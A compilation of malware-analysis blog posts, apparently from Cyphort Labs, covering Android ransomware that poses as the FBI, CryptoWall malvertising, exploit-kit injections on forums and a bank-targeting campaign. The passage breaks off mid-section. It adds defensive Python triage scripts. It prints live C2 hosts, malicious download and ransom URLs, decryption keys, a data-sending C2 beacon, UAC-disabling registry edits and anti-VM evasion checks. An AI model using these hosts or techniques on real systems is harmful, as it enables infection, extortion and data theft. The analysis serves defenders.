Channel: Paul Kimayong – Cyphort

Ransommail: Ransomware Mobile Twist With Blackmail


We have all read about the CryptoLocker malware that encrypts the victim’s data and then asks for ransom money in exchange for decrypting it. We have also heard many real-life stories in which politicians and the mafia have blackmailed people in order to “persuade” them into doing something. If you think you are safe from blackmail because you are neither a politician nor involved in organized crime, think again. CyphortLabs has started seeing Android malware that combines blackmail tactics with a ransomware design in order to extort money from you. Back in July this year, an Android ransomware named FBI/Lock started to emerge. CyphortLabs analyzed two samples which we believe to be a new variant of this family.

This article shares some findings from our analysis of the following two samples:

MD5                                Source URL
bd4ed8b3b5d37f34fb63ce2798c585e9   http://kjkobll.girlamus18.com/p1/pornvideo.apk
1c2c8894ab12a38b7420c7e04ed690f3   http://vfaywnaul.yagirls18.us/pornvideo.apk

 

What is it about?

The app poses as a porn application. It displays the following videos, which entice the user into thinking that he has just installed a porn app.

Fig.1 Main page of the app

 

But that isn’t the case. After a few seconds it displays the following screen from “The FBI”, saying that your phone has been locked for containing pornographic material involving children, which violates the law. To scare you further, it claims that your face has been captured together with evidence of the violation and uploaded to the FBI Datacenter. To clear the violation, it asks you to pay a penalty of $500 within 3 days, and instructs you to pay through MoneyPak.

Fig. 2. FBI Lock Message

 

Worse, the message above stays on screen and takes over the whole display even if you press Home or Exit, which makes the phone unusable. It also presents “evidence” of the violation: your phone details and, if one exists, your picture.

Fig. 3. Evidences

 

Fig. 4. MoneyPak payment

Upon installation, it asks the user to activate it as a device administrator. This makes the malware harder to remove, because you need to deactivate it under Device Administrators before you can uninstall or delete the app.

Fig. 5. Device administrator forced activation

 

When you cancel, it sends an intent that displays the device administrator activation prompt again, forcing you to accept it.


 

It also asks for permission to encrypt data, so that when you try to disable the device administrator it has another trick: it returns a string saying that all your data will be reset.

Although it contains code that encrypts and decrypts data, that function does not appear to be called from anywhere else. This likely means the malware is still under development and is heading in the direction of becoming the CryptoLocker of Android. It uses simple AES encryption, which is far simpler than the Windows CryptoLocker’s use of asymmetric encryption. The AES key is also hardcoded in the app, so it can easily be recovered by reversing.

 


 

 

What is happening in the background?

The onCreate() method of the main activity retrieves the contacts and posts them to its CnC server. For these two samples, it posts to the following servers:

 

It also retrieves the following details:

  • IMEI
  • Email
  • Network information
  • Phone information and model
  • Country

It also captures your picture by activating the front-facing camera and saves it under the folder CameraData777.

 

How does it lock your phone?

It registers a background service that continuously locks your screen via a WebView. First, it sets a 30-second alarm that will start the locking service. That 30-second window is probably meant to make you think the phone is not doing anything abnormal. After the 30 seconds, it launches the service, which creates a WebView layout; this lets the app load an HTML page from inside the app without calling the browser. The service loads a local HTML page, index.html, from the assets folder.

 

Suspicious Manifest

 

This app declares a large number of dangerous permissions:

  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.INTERNET
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.WAKE_LOCK
  • android.permission.GET_TASKS
  • android.permission.WRITE_SETTINGS
  • android.permission.CAMERA
  • android.permission.READ_PHONE_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.READ_CONTACTS
  • android.permission.GET_ACCOUNTS

 

The SYSTEM_ALERT_WINDOW permission allows the application to show a system-alert window that can take over your screen; this is an early clue that it is ransomware. RECEIVE_BOOT_COMPLETED lets the app start on boot.

It also uses random names for its classes and has an autostart receiver.
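As an added illustration (not code from the Cyphort post), the following Python script applies the manifest heuristics described above to a constructed manifest: it lists the requested permissions, looks for a device-admin receiver and a boot receiver, and reports when the overlay permission is combined with a persistence mechanism, which is the core of the screen-locker pattern. The manifest text, the package name and the indicator tables are assumptions made for this example, not the real sample's manifest.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that, in combination, match the screen-locker pattern from the post.
LOCKER_PERMISSIONS = {
    "android.permission.SYSTEM_ALERT_WINDOW": "can draw over every other app (screen takeover)",
    "android.permission.RECEIVE_BOOT_COMPLETED": "can restart itself after a reboot",
    "android.permission.GET_TASKS": "can watch which app is in the foreground",
}
# Permissions that match the data-collection behaviour described in the post.
COLLECTION_PERMISSIONS = {
    "android.permission.READ_CONTACTS": "contact list exfiltration",
    "android.permission.CAMERA": "can photograph the user",
    "android.permission.READ_PHONE_STATE": "IMEI and phone identity",
    "android.permission.GET_ACCOUNTS": "account e-mail addresses",
}


def triage_manifest(manifest_xml: str) -> dict:
    """Score a decoded AndroidManifest.xml against the locker pattern."""
    root = ET.fromstring(manifest_xml)
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    # A device-admin receiver is protected by the BIND_DEVICE_ADMIN permission.
    device_admin = any(
        el.get(ANDROID_NS + "permission") == "android.permission.BIND_DEVICE_ADMIN"
        for el in root.iter("receiver")
    )
    # An autostart receiver listens for BOOT_COMPLETED.
    boot_receiver = any(
        el.get(ANDROID_NS + "name") == "android.intent.action.BOOT_COMPLETED"
        for el in root.iter("action")
    )
    locker = sorted(p for p in perms if p in LOCKER_PERMISSIONS)
    collection = sorted(p for p in perms if p in COLLECTION_PERMISSIONS)
    # Overlay permission plus a way to persist (device admin or boot receiver)
    # is what makes the "your phone is locked" screen stick.
    locker_pattern = (
        "android.permission.SYSTEM_ALERT_WINDOW" in perms
        and (device_admin or boot_receiver)
    )
    return {
        "package": root.get("package"),
        "permissions": sorted(p for p in perms if p),
        "device_admin_receiver": device_admin,
        "boot_receiver": boot_receiver,
        "locker_indicators": locker,
        "collection_indicators": collection,
        "locker_pattern": locker_pattern,
    }


# Constructed manifest modelled on the permissions listed in the post (not the real sample's).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.pornvideo">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.GET_TASKS"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <application android:label="Porn Video">
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for field, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{field}: {value}")
```

The decoded manifest can be obtained from an APK with apktool or a similar resource decoder; the script only takes the resulting XML text. The verdict is a triage hint, not a detection on its own: legitimate screen-filter or launcher apps also request SYSTEM_ALERT_WINDOW, which is why the script reports the individual indicators alongside the combined pattern.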


 

What can you do if you are infected with this ransomware?

The normal uninstall and delete do not work for this kind of app, because your phone is locked and the app is installed as a device administrator. You need to restart your phone in safe mode, in which only the basic apps are started. Then go to Security Settings and locate the Device Administrators page, remove the malware app from the device administrators, uninstall the app, and reboot your phone in normal mode.

 

Key Takeaways

Given that much cybercrime follows the money, it is only a matter of time before ransomware like CryptoLocker moves from targeting Windows users to targeting Mac users, and from desktops to smartphones. However, this style of malware, which combines blackmail tactics with a ransomware design, represents a more significant advance in the malware threat; we refer to it as “ransommail” malware. Several features of this malware are worth noting:

  • It is ransomware in that it holds the victim’s reputation for ransom.
  • It is blackmail in that it threatens the victim with the legal consequences of viewing porn.
  • It is a different kind of social engineering attack in that it exploits human vulnerabilities: curiosity and pride in one’s reputation.
  • It combines fraudulent representation (claiming to be from the FBI) with privacy-invading means on the smartphone (captured personal identification information and photograph) in the blackmail act.

Given the growing population of Android phone users, we are bound to see more such malware attacks. Users should be careful to download mobile apps only from trusted app stores, and to watch what their apps are doing on their phones.

Users are advised to:

  • Do not install apps from untrusted sources. It is safer to install apps from known reputable sources such as the Google Play Store.
  • Have some level of protection. We all know that antivirus software cannot catch everything, but having antivirus installed is much better than having no protection at all.
  • Monitor your running apps and processes. Most of the time a normal user won’t look at the running apps on his or her device, but you might find something there that shouldn’t be running and is probably malware. A quick Google search for the app name or the package name of the installed app will give you a hint as to whether it is bad.
  • Do not activate apps as device administrators unless you are sure they are clean and safe.
  • Pay attention to permissions. When a simple app that you would not expect to need the camera, your contacts or SMS access asks for such permissions, that is already a red flag.

I would like to thank Fengmin Gong and the rest of CyphortLabs team for helping me with this report.

The post Ransommail: Ransomware Mobile Twist With Blackmail appeared first on Cyphort.


Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0


On February 4, 2015, Cyphort Labs detected another malvertising campaign originating from gopego.com. The site displays a malicious advertisement that redirects through other malicious links and eventually downloads the CryptoWall ransomware.

 

The attack serves an exploit package embedded in a Flash file, including exploits that target four vulnerabilities. Among them is the notorious CVE-2015-0311, which hit affyield.com a few days earlier.

 

Fig.1: iframe redirecting to the flash EK

 

Exploit Analysis

The initial Flash file is essentially an exploit package: it is used as a platform to deliver other exploits embedded in the Flash file. As seen before, the initial Flash exploit (MD5: 31710b3fe36943bd5273d4fb0f0efa85) is obfuscated and loads a second-stage Flash file using loadBytes(). During the second stage, it stores a Flash parameter (rtConfigEncodedString) as an RC4-encrypted JSON file. The key used is ‘vukocwgsos142160’. This JSON file contains the list of URLs to the binary payloads along with the RC4 keys used to decrypt those binaries.

 

The second-stage Flash file uses ExternalInterface.call() to inject JavaScript into the browser DOM and request various properties of the execution environment.

 

It has several exploits embedded as binary data, in encrypted and compressed form. Based on the environment, it chooses an appropriate exploit, decrypts it using RC4, and decompresses it if necessary. The decryption key used is “florbgd622662”. Once the chosen exploit is decrypted, depending on the vulnerability being exploited it is either injected into the browser DOM via HTML/JS or loaded as a third-stage SWF file.
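For an analyst who has pulled the RC4 key strings out of the SWF, recovering the JSON configuration is a matter of trying each candidate against the encoded parameter and keeping the one that yields valid JSON. The Python below is an added example of that workflow, not code from the post or from the exploit kit: it implements plain RC4, builds a constructed config blob in the shape the post describes (payload URLs plus per-binary RC4 keys, with placeholder URLs and keys), and then identifies the correct key from the three strings the post reports.

```python
import json


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def try_decrypt_config(blob: bytes, key: str):
    """Return the parsed JSON object if `key` decrypts `blob` into a JSON document, else None."""
    try:
        text = rc4(key.encode(), blob).decode("utf-8")
        obj = json.loads(text)
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    return obj if isinstance(obj, dict) else None


def find_config_key(blob: bytes, candidates):
    """Try each candidate string (literals pulled from the SWF) until one yields a JSON object."""
    for key in candidates:
        cfg = try_decrypt_config(blob, key)
        if cfg is not None:
            return key, cfg
    return None, None


# Constructed config in the shape the post describes. The URLs and per-binary keys
# are placeholders for this example, not values recovered from the real kit.
CONFIG_KEY = "vukocwgsos142160"  # config key reported in the post
SAMPLE_CONFIG = {
    "binaries": [
        {"url": "http://payload.example.invalid/a.bin", "rc4key": "PLACEHOLDER_KEY_1"},
        {"url": "http://payload.example.invalid/b.bin", "rc4key": "PLACEHOLDER_KEY_2"},
    ]
}
SAMPLE_BLOB = rc4(CONFIG_KEY.encode(), json.dumps(SAMPLE_CONFIG).encode())

# The three key strings the post reports, used here as an analyst's candidate list.
CANDIDATE_KEYS = ["florbgd622662", "fxfdaxrrax", "vukocwgsos142160"]

if __name__ == "__main__":
    key, cfg = find_config_key(SAMPLE_BLOB, CANDIDATE_KEYS)
    print("config key:", key)
    for entry in cfg["binaries"]:
        print(entry["url"], "-> per-binary key", entry["rc4key"])
```

The same rc4() routine applies to the other two stages the post names (the embedded exploit blobs and the downloaded payload), since each is a single RC4 pass under its own key; only the validity check changes (a decompressed SWF header or an MZ header instead of JSON).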


 

The screenshot above shows binaries which exploit the following vulnerabilities:

  • CVE-2013-2551 – nw2_html
  • CVE-2014-6332 – nw7_html
  • CVE-2015-0311 – nw9_swf
  • CVE-2014-0569 – nw6_swf

 

After successful exploitation, the shellcode downloads an RC4-encrypted binary over the network, which it decrypts using the key “fxfdaxrrax”.

Cryptowall 3.0 downloaded over the network

 

Payload

MD5: 0cffee266a8f14103158465e2ecdd2c1

The final payload is a variant of CryptoWall version 3.0 (also known as Crowti). Like its predecessor, it uses the RSA-2048 algorithm to encrypt files on the hard disk. It also drops the following, already well-known files in each affected directory; they contain instructions on how to pay the ransom.

 

Once it has finished encrypting files, the malware visits the URL http://paytoc4gtpn5czl2.torpaysolutions.com/hkmxYL and demands that victims pay US$500 in Bitcoin in order to receive the decryption key that allows them to recover their files. It also displays a 168-hour (7-day) countdown for paying the ransom; if the victim does not comply, the price increases to USD $1,000 after the countdown.

Instruction on how to pay the ransom using bitcoin

The ransomware program provides users with links to several Tor gateways leading to CryptoWall decryption services hosted on the Tor network.

There have also been reports that this new version of CryptoWall uses the I2P (Invisible Internet Project) anonymity network for communication between victims and controllers, to hide from researchers and law enforcement officials.

We have seen this malware connect to following CnC servers:

  • asthalproperties.com:4444
  • pratikconsultancy.com:8080

It retrieves the victim’s IP address by visiting ip-addrs.es.

Cyphort Labs has seen malvertising campaigns on the rise. They continue to be threat actors’ favourite method of delivering drive-by-download attacks. With every discovery of a zero-day exploit, actors rapidly take advantage and update their kits to deliver malicious binaries more reliably. It is always advisable to take precautions when surfing the web and to patch software to the latest available version.

Special thanks to McEnroe Navaraj, Alex Burt and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0 appeared first on Cyphort.

DIY Chatroom and over a hundred forums injected with malware


Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites. They are powered by outdated software, so a vulnerability in it was likely used to compromise them and inject the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware which is sandbox-aware (it does not execute in virtual environments). As of Apr 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on VirusTotal.

On April 6, 2015, Diychatroom.com was redirecting users to the Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.

The affected websites include:

  • www.Diychatroom.com
  • www.dogforums.com
  • www.e-cigarette-forum.com
  • www.excelforum.com
  • www.goldenretrieverforum.com
  • www.horseforum.com
  • www.loverslab.com
  • www.ps3news.com
  • www.scubaboard.com
  • www.visajourney.com
  • www.wranglerforum.com
  • www.wrestlingforum.com
  • and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

Diychatroom.com Infection

The infection chain is as follows:

diychatroom.com
  —> numerarm.org (redirect URL)
      —> http://livefastmap.eu/xxx1 (Fiesta EK landing)
      —> http://livefastmap.eu/xxx2 (Flash exploit)
      —> http://livefastmap.eu/xxx3 (binary payload)

 

This EK is heavily obfuscated, but after several layers of deobfuscation it clearly reveals what it is trying to do. It exploits the following vulnerabilities:

  • CVE-2013-2551 (IE)
  • CVE-2015-0313 (Flash)

CVE-2013-2551

First layer of flash using LoadBytes() to load second layer

Second layer flash. CVE-2015-0313

 

Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

 

Payload

The payload arrives encrypted over the network. This is multi-stage malware involving two files obtained from the dropper’s resources and one downloaded file.

  • 77f22bfc9cf7e46c6e738d8b68ad19f6 – Main Dropper
  • c091894cd23d49a14d5cabf0d60c379c – Gamarue
  • 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
  • 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

 

Main Dropper

The main dropper is armored and will not execute in a virtual environment.

Armoring:

  • anti-virtualbox
  • anti-qemu
  • anti-vmware

It checks for the presence of the strings VBOX, QEMU and VMWARE in the value returned by SetupDiGetDeviceRegistryPropertyW.

 

On a non-virtual system, it drops two files obtained from its resources in the %TEMP% folder and executes them via CreateProcess or ShellExecute.

 

 

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new msiexec.exe process and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% under a random filename, e.g., “mssffnmc.exe”.

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  Value: {random}
  Data: %ALLUSERPROFILE%\{copy of itself}

 

It disables some Windows security settings by changing the values of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
  Value: “EnableLUA”
  Data: “0”

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  Value: “TaskbarNoNotification”
  Data: “1”
  Value: “HideSCAHealth”
  Data: “1”

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  Value: “Hidden”
  Data: “2”
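The registry changes just listed are the kind of thing an incident responder can check for mechanically. The Python below is an added example (not from the post) that parses a .reg export, the text produced by `reg export`, and reports the four policy values the dropper sets together with any policy-based Run entries. The export text is constructed for the example; the value name and path in its Run entry are made up.

```python
import re

# Values the Gamarue dropper sets, as listed in the post. Paths are lower-cased and use
# the HKLM/HKCU short forms so they can be matched against a normalized export.
POLICY_RULES = [
    (r"hklm\software\microsoft\windows\currentversion\policies\system",
     "enablelua", 0, "UAC disabled (EnableLUA=0)"),
    (r"hklm\software\microsoft\windows\currentversion\policies\explorer",
     "taskbarnonotification", 1, "taskbar notification balloons suppressed"),
    (r"hklm\software\microsoft\windows\currentversion\policies\explorer",
     "hidescahealth", 1, "Security Center health icon hidden"),
    (r"hkcu\software\microsoft\windows\currentversion\explorer\advanced",
     "hidden", 2, "hidden files not shown in Explorer"),
]
POLICY_RUN_KEY = r"hklm\software\microsoft\windows\currentversion\policies\explorer\run"
HIVE_SHORT = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
VALUE_LINE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg_export(text: str) -> dict:
    """Parse .reg export text into {normalized_key: {value_name: value}} for dword and string values."""
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            hive, _, rest = line[1:-1].partition("\\")
            current = HIVE_SHORT.get(hive.lower(), hive.lower()) + "\\" + rest.lower()
            result.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = VALUE_LINE.match(line)
            if m:
                name, dword, string = m.groups()
                if dword is not None:
                    result[current][name.lower()] = int(dword, 16)
                else:
                    # .reg files escape backslashes as "\\"; undo that for the stored path
                    result[current][name.lower()] = string.replace("\\\\", "\\")
    return result


def find_policy_tampering(reg: dict) -> list:
    """Return human-readable findings for the settings the dropper changes."""
    findings = []
    for key, value_name, bad_value, meaning in POLICY_RULES:
        if reg.get(key, {}).get(value_name) == bad_value:
            findings.append(meaning)
    # Anything under the policy Run key runs at logon and is rarely set legitimately.
    for name, data in reg.get(POLICY_RUN_KEY, {}).items():
        findings.append(f"policy-based autostart: {name} -> {data}")
    return findings


# Constructed export resembling an infected host; the Run value name and path are made up,
# the dropped filename follows the post's example.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"xkqzrtpa"="C:\\ProgramData\\mssffnmc.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"TaskbarNoNotification"=dword:00000001
"HideSCAHealth"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
"ShowSuperHidden"=dword:00000000
"""

if __name__ == "__main__":
    for finding in find_policy_tampering(parse_reg_export(SAMPLE_EXPORT)):
        print("-", finding)
```

Exporting the three keys from a suspect machine and feeding the files to this script gives a quick answer; on a clean host the expected result is an empty list, since none of these values is set by default and the policy Run key is normally absent.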

 

It connects to its CnC server, nindziaboy.net, to send data and receive commands. Communication with the server is encrypted, and depending on the reply it can perform the following commands:

  • Report 
  • Update
  • Start

 

It also performs DNS requests to the following domains:

  • africa.pool.ntp.org
  • oceania.pool.ntp.org
  • asia.pool.ntp.org
  • south-america.pool.ntp.org
  • north-america.pool.ntp.org
  • europe.pool.ntp.org

 

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

 

This malware’s main purpose is to open several hidden IE instances that access websites.

Like the main dropper, it exits and does nothing if it detects that it is running in a virtual environment.

 

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then creates a service for itself named “SystemUpdate”.

 

It injects into one of iexplore.exe, chrome.exe, firefox.exe or explorer.exe to gain elevated privileges and tries to stop the following services:

  • SharedAccess
  • wscsvc
  • MpsSvc
  • WinDefend
  • wuauserv
  • BITS
  • ERSvc
  • WerSvc

It creates five threads that each launch a hidden Internet Explorer browser that visits the following URLs:

  • http://videosearcher{.}org/4ff9ae/9126
  • http://truesearchresults{.}com/?aff=7733&saff=9126

 

Created several hidden IE instances that visit a URL

Afterwards, the following network connections were observed:

GET /analytics.js HTTP/1.1

Accept: */*

Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)

Accept-Encoding: gzip, deflate

Host: www.google-analytics.com

Connection: Keep-Alive

 

GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1

Accept: */*

Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)

Accept-Encoding: gzip, deflate

Host: counter.yadro.ru

Connection: Keep-Alive

 

Additional details:

It creates a mutex with the following name:

  • _HSJ909NJJNJ90203_

It connects to the following URL to get the geolocation of the victim’s machine:

  • www.telize.com/geoip

If it detects that it is running on a 64-bit system, it loads its 64-bit counterpart, which is found in its resources.

 

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

 

This file is downloaded from the following link:

  • http://clenodium{.}eu/tmp/file{.}exe

 

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}.

It creates a new wuauclt.exe process and injects into it. It contacts the following CnC server and waits for commands:

  • dobavki-shop.com

 

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

As the CnC request above shows, it sends system information in clear text, including:

  • MachineGuid
  • OS version
  • Display device (monitor) name

 

It waits for the following commands from the server:

  • #none – do nothing
  • #stop
  • #update – update self
  • #update_miner
  • #opencl
  • #destruct – kill self
  • #error
  • #download  – Download files


The server evaluates the information received from the infected computers and replies with one of the commands listed above. When the trojan reports that it is running in a virtual environment (or sandbox), the server stays low and replies with the command #none.

Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are infected with this same attack. These forum sites are powered by vBulletin or by IP Board.

Early this year, the Sucuri blog reported a serious vulnerability affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin, but it was discontinued due to several vulnerabilities. The sad fact is that some websites still use it.

For website administrators affected by this attack, Sucuri posted the following options:

  1. Completely remove vBSEO from your site – It is not supported anymore
  2. Apply the patch recommended by the vBulletin team
  3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

For visitors of forum sites, ensure that you are running the latest versions of your browser and Flash, as this attack involves IE and Flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, QEMU and VMware), not even running inside VMware, which is a fairly popular platform adopted by many businesses. Indeed, Cyphort Labs has seen malware samples which singled out VirtualBox and QEMU for evasion but were happy to run inside VMware. In those cases, the objective of the armoring design seems to be anti-analysis or anti-sandboxing. As we mentioned earlier, this malware campaign has targeted over a hundred forums which seem to serve mostly individual home users, and as we saw from the attack payload (TrojanClicker.FleerCivet), it is part of a click-fraud campaign. For click fraud to look legitimate, it had better come from home users, and how many home users’ machines actually run VirtualBox, QEMU or VMware? Very few. So we believe that this malware pack is designed for a click-fraud campaign and for distribution using watering-hole attacks, and that the armoring against all the virtualization environments is there to avoid detection by anti-click-fraud systems.

Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.

Multiple Malwares used to Target an Asian Financial Institution


Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company name anonymous. According to the source, the initial entry point of the attack was a spear-phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against the heuristic signatures commonly used by antivirus companies. The various malware samples also show a common theme, such as installing themselves in the %ProgramFiles% or %UserProfile% folder depending on whether the user has admin privileges. Additionally, most of the samples are compiled with Borland Delphi, with their strings encrypted and API names either obfuscated or split into several strings as protection against heuristic signatures. None of the samples is packed except for one.

Based on the file creation dates, it appears the attack started as early as January 2015 and lasted for three months.

 

Summary of samples used in this attack

Filename           MD5                                Malware Family   Compiler          Packer    Function
GoogleUpdate.exe   34bad798c01b4b52d708c1409590ea30   Invader          Borland Delphi    None      Backdoor
Flash32.exe        a32d4a717fde77f437f9a01a7b8b8478   Invader          Borland Delphi    None      Backdoor
mslives.exe        52f4092576e46747db71fb2c018d6ec5                    Borland Delphi    None      Downloader
nethost.exe        3f9e7a1fb8093994ea0f0bbf151ff1e0   Nioupale         C++               None      Backdoor
mpsvc.exe          4e25c2fc8cb2c57ae66ee3cf851e4bc7   Nioupale         Borland Delphi    None      Backdoor
winhost.exe        044e2e7c4813accdbe030c49cef3326b   Hdoor            Borland Delphi    Aspack    Backdoor
dllhost.exe        387942a24884ccadb60b7e7670a0f723                    C++               None      Downloader
shell64.dll        abf5e379e336f0e6f7314f8bb3f7bcba   PCclient         C++               None      Infostealer
shell64_u.dll      756c11141ab617a2fe38b963a5548378                    C++               None      Loader
Technical Analysis

GoogleUpdate.exe

The file structure is not what we commonly see in prevalent malware today. Why? Because most AV products today employ heuristic-based detection that flags packed samples and samples with an uncommon file structure. This malware is not packed, and its sections resemble those of a normal file.

Strings are encrypted and are only decrypted right before use. The malware also splits its API names into several strings. This too is to avoid heuristic signatures that look for suspicious strings and APIs.

 

It drops a copy of itself in the %ProgramFiles% folder if the user is an admin and in the %UserProfile% folder if not:

If admin:

  • %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

  • %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with a service name of “SENSS”.  


 

After checking that it is successfully running as a service, it checks whether the parent process is explorer.exe or iexplore.exe. If so, it loads its DLL from its data section; this DLL is encrypted via XOR with 0x89 as the key. Otherwise, it enumerates processes, finds services.exe and injects its DLL there.

Anti-Sandbox

Detects Sleep Acceleration

